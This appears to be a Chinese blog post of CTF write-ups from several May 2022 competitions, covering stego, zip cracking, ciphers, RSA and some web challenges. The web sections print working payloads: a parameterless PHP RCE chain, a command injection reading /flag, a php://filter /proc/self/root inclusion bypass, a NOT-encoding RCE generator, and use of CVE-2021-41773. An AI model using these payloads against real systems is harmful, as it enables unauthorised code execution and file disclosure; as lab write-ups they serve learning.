当前位置:网站首页>五月份比赛WP
五月份比赛WP
2022-07-30 05:41:00 【Msaerati】
ISCC
单板小将苏单板小将苏翊鸣
需改图片的高度得到

扫码得到unicode解码
在这次冬奥会的舞台上,我国小将苏翊鸣斩获一金一银,那你知道此次冬奥会我国总共获得几枚奖牌吗?又分别是几金几银几铜呢?
分别是 15 9 4 2 合起来是压缩包密码,解密得到flag
藏在星空里的诗-2
只看出了\QTTPU\QTTED\QTTPD\QTTPD类似unicode编码,
最后星爷对照表发现了规律
春秋杯
tiger
看到题目提示

用rot47来解密ag2a`f76:28a217fe
在Githack里下载加密的lsb脚本
python lsb.py extract key.png-stego.png 1.txt 28a217fe
得到压缩包密码71zr9H6jnXRHn64WBxMbCzz16saCZWiw
明文攻击,得到解压密码为
[email protected]= 解出来是个二维码,扫描后得到零宽
Owl wvn n xhkm SBWav krttqbu gfq gja jhheu up yljycxjpu, vvtx R jzeh pydv usd zp lalhmk, ic brtkac ya whep{866q3755-t358-5119-txnr-juw666e8099m}, uroa okv!
再爆破维吉尼亚
Vigenere Solver - www.guballa.de
You are a good CTFer because you can solve my challenge, next I will give you my secret, my secret is flag{866d3755-c358-5119-abeb-bda666a8099d}, have fun!
Mercy-code
无参数RCE
Byte CTF boring_code(fuzz,无参数RCE)_HyyMbb的博客-CSDN博客
show_source(end(scandir(next(str_split(zend_version())))));
两小时ak赛
签签
放到010在最后发现一串base64解码得到flag
你猜猜是什么注入

直接尝试cat /flag没有反应 尝试将结果传入一个文本
cat /flag | tee 1.txt
之后访问1.txt
得到flag

这4什么好看的
打开是一个jpeg图片010啥的基本操作都没有发现,猜测用stghide
先爆破出密码

之后用steghide提取文件

打开得到flag
高实在是高

看到high_m直接在sage运行网上的脚本就可以

Dest0g3 520迎新赛
phpdest

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
php源码分析 require_once 绕过不能重复包含文件的限制 - 安全客,安全资讯平台
EasyPHP

目的是print fl4g
就得触发set_error_handler函数,这个函数是自定义报错修复函数,我们可以传入一个数组让他报错就可以print flag
?ctf[]=1
SimpleRCE
看到源码,就知道了考点是无字母数字绕过正则表达式,这里我们用了取反,因为取反,用的基本是不可见字符,不会触发到正则表达式,写一个php脚本

<?php $system=$_GET['q']; $command=$_GET['p']; echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
本地运行后进行传参




用bp传参即可
Pngenius
打开题目发现一个png图片,先用zsetg梭一下

发现了一个zip的压缩包,猜测里面有个压缩包,用binwalk果然发现zip但分离不出来

用010手动分离

输入密码得到flag
EasyEncode
打开题目一个加密的压缩爆
直接暴力破解得到

打开压缩包得到一串morse解密

再16进制转字符串

Unicode解码

将%3d改为=后base64解码

babyRSA

一个基本的rsa
先用yafu吧n分解

套上脚本就ok

2022DASCTF MAY 出题人挑战赛
Power Cookie

题目提示要admin进入才可以,题目是powercookie应该就是越权了

魔法浏览器
抓包看到

用将bytes转为字符串


getme
打开页面查看源码

发现绿色部分,百度发现有个叫CVE-2021-41773的漏洞
CVE-2021-41773漏洞复现_糊涂是福yyyy的博客-CSDN博客_简单的漏洞复现
可以用inbug这个东西利用

简单的输入命令就ok

ctfshow单身杯
misc1. misc签到
一个加密的压缩包提示五位字符直接爆破

解压出一个图片放010发现一串base64

用base64转图片出一张二维码



但啥也没有题目说lsb中有东西

发现flag
边栏推荐
猜你喜欢
随机推荐
三子棋游戏实现(c语言)
optimizer.zero_grad()
81.搜索旋转排序数组II(数组旋转后二分查找)
easyexcel使用教程-导出篇
pycharm专业版 配置pytest
最新Redistemplate配置及使用,附带操作工具类,测试类
函数解剖——深挖printf()与scanf()
别找了,你要的C语言“数组”在这里
js 实现自定义签名
5.5线程池
事件高级:事件的绑定及取消、DOM事件流、事件委托
【墨者学院】身份认证失效漏洞实战
P3 元宝第五单元笔记
Application Practice | Application Practice of Apache Doris in Baidu Intelligent Cloud Billing System
使用Nodejs搭建Web Server(入门教程)
524.通过删除字母匹配到字典里最长单词
P3 元宝第六单元笔记
关于浅拷贝和深拷贝,草稿闲了写
String类型字符串获取第一次或者最后一次出现的下标
【无标题】ES5新特性









